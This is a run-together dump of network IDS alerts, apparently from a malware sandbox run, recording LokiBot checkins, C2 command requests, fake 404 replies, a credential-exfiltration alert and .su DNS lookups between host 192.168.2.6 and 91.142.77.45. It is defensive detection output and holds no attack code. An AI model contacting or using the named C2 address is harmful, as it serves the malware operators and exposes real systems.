                                      192.168.2.691.142.77.4549731802825766 11/03/22-12:31:09.511791TCP2825766ETPRO TROJAN LokiBot Checkin M24973180192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549738802025381 11/03/22-12:31:33.019427TCP2025381ET TROJAN LokiBot Checkin4973880192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549712802024313 11/03/22-12:30:22.162497TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971280192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497142025483 11/03/22-12:30:29.899760TCP2025483ET TROJAN LokiBot Fake 404 Response804971491.142.77.45192.168.2.6
                                      91.142.77.45192.168.2.680497162025483 11/03/22-12:30:34.572782TCP2025483ET TROJAN LokiBot Fake 404 Response804971691.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549706802021641 11/03/22-12:30:09.785093TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970680192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549730802024313 11/03/22-12:31:07.626823TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973080192.168.2.691.142.77.45
                                      192.168.2.68.8.8.861609532014169 11/03/22-12:30:50.734926UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6160953192.168.2.68.8.8.8
                                      192.168.2.68.8.8.862958532014169 11/03/22-12:31:41.802948UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6295853192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549735802024318 11/03/22-12:31:27.516452TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973580192.168.2.691.142.77.45
                                      192.168.2.68.8.8.849232532014169 11/03/22-12:31:30.955921UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related4923253192.168.2.68.8.8.8
                                      192.168.2.68.8.8.862848532014169 11/03/22-12:31:45.492508UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6284853192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549733802025381 11/03/22-12:31:22.614964TCP2025381ET TROJAN LokiBot Checkin4973380192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549732802021641 11/03/22-12:31:20.467945TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973280192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549720802024318 11/03/22-12:30:45.793165TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972080192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549718802025381 11/03/22-12:30:37.003049TCP2025381ET TROJAN LokiBot Checkin4971880192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549721802825766 11/03/22-12:30:48.032802TCP2825766ETPRO TROJAN LokiBot Checkin M24972180192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549720802024313 11/03/22-12:30:45.793165TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972080192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549714802024318 11/03/22-12:30:27.432237TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971480192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549719802024318 11/03/22-12:30:42.564459TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971980192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549725802024313 11/03/22-12:30:57.918358TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972580192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549715802825766 11/03/22-12:30:31.132672TCP2825766ETPRO TROJAN LokiBot Checkin M24971580192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549719802024313 11/03/22-12:30:42.564459TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971980192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549710802825766 11/03/22-12:30:18.297577TCP2825766ETPRO TROJAN LokiBot Checkin M24971080192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549734802021641 11/03/22-12:31:25.377976TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973480192.168.2.691.142.77.45
                                      192.168.2.68.8.8.862910532014169 11/03/22-12:30:27.345778UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6291053192.168.2.68.8.8.8
                                      91.142.77.45192.168.2.680497352025483 11/03/22-12:31:28.883670TCP2025483ET TROJAN LokiBot Fake 404 Response804973591.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549737802021641 11/03/22-12:31:31.046497TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973780192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497422025483 11/03/22-12:31:43.475626TCP2025483ET TROJAN LokiBot Fake 404 Response804974291.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549714802024313 11/03/22-12:30:27.432237TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971480192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549711802025381 11/03/22-12:30:20.264286TCP2025381ET TROJAN LokiBot Checkin4971180192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549722802024313 11/03/22-12:30:50.822444TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972280192.168.2.691.142.77.45
                                      192.168.2.68.8.8.856331532014169 11/03/22-12:30:13.938466UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5633153192.168.2.68.8.8.8
                                      192.168.2.68.8.8.849448532014169 11/03/22-12:30:17.960732UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related4944853192.168.2.68.8.8.8
                                      192.168.2.68.8.8.850506532014169 11/03/22-12:30:15.990659UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5050653192.168.2.68.8.8.8
                                      192.168.2.68.8.8.859752532014169 11/03/22-12:31:35.521025UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5975253192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549722802024318 11/03/22-12:30:50.822444TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972280192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549726802021641 11/03/22-12:30:59.657451TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972680192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549741802025381 11/03/22-12:31:39.946873TCP2025381ET TROJAN LokiBot Checkin4974180192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497392025483 11/03/22-12:31:37.318947TCP2025483ET TROJAN LokiBot Fake 404 Response804973991.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549709802021641 11/03/22-12:30:16.075566TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970980192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549727802024318 11/03/22-12:31:01.987085TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972780192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549728802825766 11/03/22-12:31:03.903902TCP2825766ETPRO TROJAN LokiBot Checkin M24972880192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497312025483 11/03/22-12:31:10.691873TCP2025483ET TROJAN LokiBot Fake 404 Response804973191.142.77.45192.168.2.6
                                      192.168.2.68.8.8.865198532014169 11/03/22-12:30:25.312645UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6519853192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549721802021641 11/03/22-12:30:48.032802TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972180192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549715802024318 11/03/22-12:30:31.132672TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971580192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549726802825766 11/03/22-12:30:59.657451TCP2825766ETPRO TROJAN LokiBot Checkin M24972680192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549724802024313 11/03/22-12:30:54.913991TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972480192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549710802025381 11/03/22-12:30:18.297577TCP2025381ET TROJAN LokiBot Checkin4971080192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549712802021641 11/03/22-12:30:22.162497TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971280192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549735802825766 11/03/22-12:31:27.516452TCP2825766ETPRO TROJAN LokiBot Checkin M24973580192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549744802825766 11/03/22-12:31:45.577786TCP2825766ETPRO TROJAN LokiBot Checkin M24974480192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549740802021641 11/03/22-12:31:37.627027TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974080192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549743802024318 11/03/22-12:31:43.782645TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974380192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549743802024313 11/03/22-12:31:43.782645TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974380192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549707802025381 11/03/22-12:30:11.977904TCP2025381ET TROJAN LokiBot Checkin4970780192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549726802025381 11/03/22-12:30:59.657451TCP2025381ET TROJAN LokiBot Checkin4972680192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549725802024318 11/03/22-12:30:57.918358TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972580192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549707802825766 11/03/22-12:30:11.977904TCP2825766ETPRO TROJAN LokiBot Checkin M24970780192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497342025483 11/03/22-12:31:27.178865TCP2025483ET TROJAN LokiBot Fake 404 Response804973491.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549731802021641 11/03/22-12:31:09.511791TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973180192.168.2.691.142.77.45
                                      192.168.2.68.8.8.852481532014169 11/03/22-12:30:53.275834UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5248153192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549720802025381 11/03/22-12:30:45.793165TCP2025381ET TROJAN LokiBot Checkin4972080192.168.2.691.142.77.45
                                      192.168.2.68.8.8.864404532014169 11/03/22-12:31:43.694917UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6440453192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549708802025381 11/03/22-12:30:14.035064TCP2025381ET TROJAN LokiBot Checkin4970880192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549735802021641 11/03/22-12:31:27.516452TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973580192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549706802024317 11/03/22-12:30:09.785093TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24970680192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497322025483 11/03/22-12:31:21.820409TCP2025483ET TROJAN LokiBot Fake 404 Response804973291.142.77.45192.168.2.6
                                      192.168.2.68.8.8.852865532014169 11/03/22-12:31:37.538077UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5286553192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549725802825766 11/03/22-12:30:57.918358TCP2825766ETPRO TROJAN LokiBot Checkin M24972580192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497292025483 11/03/22-12:31:07.339016TCP2025483ET TROJAN LokiBot Fake 404 Response804972991.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549724802024318 11/03/22-12:30:54.913991TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972480192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549706802024312 11/03/22-12:30:09.785093TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14970680192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497212025483 11/03/22-12:30:50.362964TCP2025483ET TROJAN LokiBot Fake 404 Response804972191.142.77.45192.168.2.6
                                      91.142.77.45192.168.2.680497232025483 11/03/22-12:30:54.557575TCP2025483ET TROJAN LokiBot Fake 404 Response804972391.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549739802025381 11/03/22-12:31:35.606377TCP2025381ET TROJAN LokiBot Checkin4973980192.168.2.691.142.77.45
                                      192.168.2.68.8.8.863863532014169 11/03/22-12:30:30.240421UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6386353192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549744802021641 11/03/22-12:31:45.577786TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974480192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549745802025381 11/03/22-12:31:50.569101TCP2025381ET TROJAN LokiBot Checkin4974580192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549736802025381 11/03/22-12:31:29.221112TCP2025381ET TROJAN LokiBot Checkin4973680192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549741802021641 11/03/22-12:31:39.946873TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974180192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549742802025381 11/03/22-12:31:41.893270TCP2025381ET TROJAN LokiBot Checkin4974280192.168.2.691.142.77.45
                                      192.168.2.68.8.8.862538532014169 11/03/22-12:30:34.919732UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6253853192.168.2.68.8.8.8
                                      192.168.2.68.8.8.858595532014169 11/03/22-12:30:11.893252UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5859553192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549716802021641 11/03/22-12:30:32.992651TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971680192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549728802024313 11/03/22-12:31:03.903902TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972880192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549725802021641 11/03/22-12:30:57.918358TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972580192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549728802024318 11/03/22-12:31:03.903902TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972880192.168.2.691.142.77.45
                                      192.168.2.68.8.8.855956532014169 11/03/22-12:31:47.481296UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5595653192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549734802024313 11/03/22-12:31:25.377976TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973480192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549719802021641 11/03/22-12:30:42.564459TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971980192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549723802025381 11/03/22-12:30:53.367985TCP2025381ET TROJAN LokiBot Checkin4972380192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549737802024313 11/03/22-12:31:31.046497TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973780192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549740802024313 11/03/22-12:31:37.627027TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974080192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549717802025381 11/03/22-12:30:35.019960TCP2025381ET TROJAN LokiBot Checkin4971780192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549734802024318 11/03/22-12:31:25.377976TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973480192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497372025483 11/03/22-12:31:32.671321TCP2025483ET TROJAN LokiBot Fake 404 Response804973791.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549716802825766 11/03/22-12:30:32.992651TCP2825766ETPRO TROJAN LokiBot Checkin M24971680192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549722802825766 11/03/22-12:30:50.822444TCP2825766ETPRO TROJAN LokiBot Checkin M24972280192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549722802021641 11/03/22-12:30:50.822444TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972280192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549740802024318 11/03/22-12:31:37.627027TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974080192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497402025483 11/03/22-12:31:39.620076TCP2025483ET TROJAN LokiBot Fake 404 Response804974091.142.77.45192.168.2.6
                                      192.168.2.68.8.8.859082532014169 11/03/22-12:30:20.174105UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5908253192.168.2.68.8.8.8
                                      192.168.2.68.8.8.851530532014169 11/03/22-12:30:41.510499UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5153053192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549709802024313 11/03/22-12:30:16.075566TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970980192.168.2.691.142.77.45
                                      192.168.2.68.8.8.860032532014169 11/03/22-12:31:29.125849UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6003253192.168.2.68.8.8.8
                                      91.142.77.45192.168.2.680497152025483 11/03/22-12:30:32.611167TCP2025483ET TROJAN LokiBot Fake 404 Response804971591.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549738802021641 11/03/22-12:31:33.019427TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973880192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549715802024313 11/03/22-12:30:31.132672TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971580192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497262025483 11/03/22-12:31:00.653288TCP2025483ET TROJAN LokiBot Fake 404 Response804972691.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549709802024318 11/03/22-12:30:16.075566TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970980192.168.2.691.142.77.45
                                      192.168.2.68.8.8.858917532014169 11/03/22-12:31:03.812359UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5891753192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549718802024318 11/03/22-12:30:37.003049TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971880192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549721802024313 11/03/22-12:30:48.032802TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972180192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549729802825766 11/03/22-12:31:05.707382TCP2825766ETPRO TROJAN LokiBot Checkin M24972980192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549719802025381 11/03/22-12:30:42.564459TCP2025381ET TROJAN LokiBot Checkin4971980192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549721802024318 11/03/22-12:30:48.032802TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972180192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549718802024313 11/03/22-12:30:37.003049TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971880192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549714802825766 11/03/22-12:30:27.432237TCP2825766ETPRO TROJAN LokiBot Checkin M24971480192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549736802024313 11/03/22-12:31:29.221112TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973680192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549732802825766 11/03/22-12:31:20.467945TCP2825766ETPRO TROJAN LokiBot Checkin M24973280192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549743802021641 11/03/22-12:31:43.782645TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974380192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549740802025381 11/03/22-12:31:37.627027TCP2025381ET TROJAN LokiBot Checkin4974080192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549722802025381 11/03/22-12:30:50.822444TCP2025381ET TROJAN LokiBot Checkin4972280192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549742802825766 11/03/22-12:31:41.893270TCP2825766ETPRO TROJAN LokiBot Checkin M24974280192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549731802024318 11/03/22-12:31:09.511791TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973180192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497432025483 11/03/22-12:31:45.271881TCP2025483ET TROJAN LokiBot Fake 404 Response804974391.142.77.45192.168.2.6
                                      91.142.77.45192.168.2.680497452025483 11/03/22-12:31:52.163667TCP2025483ET TROJAN LokiBot Fake 404 Response804974591.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549731802024313 11/03/22-12:31:09.511791TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973180192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497412025483 11/03/22-12:31:41.587643TCP2025483ET TROJAN LokiBot Fake 404 Response804974191.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549714802025381 11/03/22-12:30:27.432237TCP2025381ET TROJAN LokiBot Checkin4971480192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549713802024318 11/03/22-12:30:25.414440TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971380192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549737802025381 11/03/22-12:31:31.046497TCP2025381ET TROJAN LokiBot Checkin4973780192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549709802025381 11/03/22-12:30:16.075566TCP2025381ET TROJAN LokiBot Checkin4970980192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549737802825766 11/03/22-12:31:31.046497TCP2825766ETPRO TROJAN LokiBot Checkin M24973780192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549736802024318 11/03/22-12:31:29.221112TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973680192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549732802025381 11/03/22-12:31:20.467945TCP2025381ET TROJAN LokiBot Checkin4973280192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549719802825766 11/03/22-12:30:42.564459TCP2825766ETPRO TROJAN LokiBot Checkin M24971980192.168.2.691.142.77.45
                                      192.168.2.68.8.8.863229532014169 11/03/22-12:30:32.906943UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6322953192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549741802024318 11/03/22-12:31:39.946873TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974180192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549744802024318 11/03/22-12:31:45.577786TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974480192.168.2.691.142.77.45
                                      192.168.2.68.8.8.849786532014169 11/03/22-12:30:06.615613UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related4978653192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549730802025381 11/03/22-12:31:07.626823TCP2025381ET TROJAN LokiBot Checkin4973080192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549744802024313 11/03/22-12:31:45.577786TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974480192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549738802024318 11/03/22-12:31:33.019427TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973880192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549727802025381 11/03/22-12:31:01.987085TCP2025381ET TROJAN LokiBot Checkin4972780192.168.2.691.142.77.45
                                      192.168.2.68.8.8.856123532014169 11/03/22-12:31:32.930668UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5612353192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549724802025381 11/03/22-12:30:54.913991TCP2025381ET TROJAN LokiBot Checkin4972480192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549741802024313 11/03/22-12:31:39.946873TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974180192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549716802024313 11/03/22-12:30:32.992651TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971680192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549713802021641 11/03/22-12:30:25.414440TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971380192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549723802021641 11/03/22-12:30:53.367985TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972380192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549707802021641 11/03/22-12:30:11.977904TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970780192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549712802825766 11/03/22-12:30:22.162497TCP2825766ETPRO TROJAN LokiBot Checkin M24971280192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549711802024318 11/03/22-12:30:20.264286TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971180192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549709802825766 11/03/22-12:30:16.075566TCP2825766ETPRO TROJAN LokiBot Checkin M24970980192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549728802021641 11/03/22-12:31:03.903902TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972880192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549711802024313 11/03/22-12:30:20.264286TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971180192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549706802825766 11/03/22-12:30:09.785093TCP2825766ETPRO TROJAN LokiBot Checkin M24970680192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549708802024313 11/03/22-12:30:14.035064TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970880192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549729802025381 11/03/22-12:31:05.707382TCP2025381ET TROJAN LokiBot Checkin4972980192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549708802024318 11/03/22-12:30:14.035064TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970880192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497172025483 11/03/22-12:30:36.516442TCP2025483ET TROJAN LokiBot Fake 404 Response804971791.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549716802024318 11/03/22-12:30:32.992651TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971680192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549739802825766 11/03/22-12:31:35.606377TCP2825766ETPRO TROJAN LokiBot Checkin M24973980192.168.2.691.142.77.45
                                      192.168.2.68.8.8.865044532014169 11/03/22-12:31:27.427876UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6504453192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549745802021641 11/03/22-12:31:50.569101TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974580192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549745802825766 11/03/22-12:31:50.569101TCP2825766ETPRO TROJAN LokiBot Checkin M24974580192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549734802825766 11/03/22-12:31:25.377976TCP2825766ETPRO TROJAN LokiBot Checkin M24973480192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549710802021641 11/03/22-12:30:18.297577TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971080192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497132025483 11/03/22-12:30:26.998667TCP2025483ET TROJAN LokiBot Fake 404 Response804971391.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549740802825766 11/03/22-12:31:37.627027TCP2825766ETPRO TROJAN LokiBot Checkin M24974080192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549733802024313 11/03/22-12:31:22.614964TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973380192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549738802024313 11/03/22-12:31:33.019427TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973880192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549715802021641 11/03/22-12:30:31.132672TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971580192.168.2.691.142.77.45
                                      192.168.2.68.8.8.856086532014169 11/03/22-12:30:57.832797UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5608653192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549733802024318 11/03/22-12:31:22.614964TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973380192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497282025483 11/03/22-12:31:05.359036TCP2025483ET TROJAN LokiBot Fake 404 Response804972891.142.77.45192.168.2.6
                                      91.142.77.45192.168.2.680497202025483 11/03/22-12:30:47.547245TCP2025483ET TROJAN LokiBot Fake 404 Response804972091.142.77.45192.168.2.6
                                      91.142.77.45192.168.2.680497242025483 11/03/22-12:30:57.636605TCP2025483ET TROJAN LokiBot Fake 404 Response804972491.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549735802025381 11/03/22-12:31:27.516452TCP2025381ET TROJAN LokiBot Checkin4973580192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549727802021641 11/03/22-12:31:01.987085TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972780192.168.2.691.142.77.45
